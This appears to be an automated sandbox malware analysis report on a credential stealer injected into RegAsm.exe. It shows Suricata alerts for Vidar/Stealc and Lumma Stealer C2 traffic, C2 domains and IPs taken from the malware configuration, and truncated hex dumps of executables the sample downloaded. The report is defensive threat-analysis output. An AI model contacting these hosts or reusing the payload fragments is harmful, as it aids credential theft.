Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	9_2_004104D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+38h]	9_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h	9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	9_2_00424640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_0041C660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	9_2_00415E62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000D8h]	9_2_0042866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	9_2_00403E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	9_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	9_2_00423F07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp edx	9_2_0043A796

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49739 -> 147.45.68.138:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2055575 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (awwardwiqi .shop) : 192.168.2.4:56576 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055576 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (awwardwiqi .shop in TLS SNI) : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.4:55775 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.4:64147 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49744 -> 95.164.119.162:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.68.138:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 147.45.68.138:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: traineiwnqo.shop
Source: Malware configuration extractor	URLs: caffegclasiqwp.shop
Source: Malware configuration extractor	URLs: awwardwiqi.shop
Source: Malware configuration extractor	URLs: stamppreewntnq.shop
Source: Malware configuration extractor	URLs: evoliutwoqm.shop
Source: Malware configuration extractor	URLs: millyscroqwp.shop
Source: Malware configuration extractor	URLs: condedqpwqm.shop
Source: Malware configuration extractor	URLs: locatedblsoqp.shop
Source: Malware configuration extractor	URLs: stagedchheiqwo.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199761128941

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:20 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:26 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:27 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:27 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Aug 2024 20:52:28 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 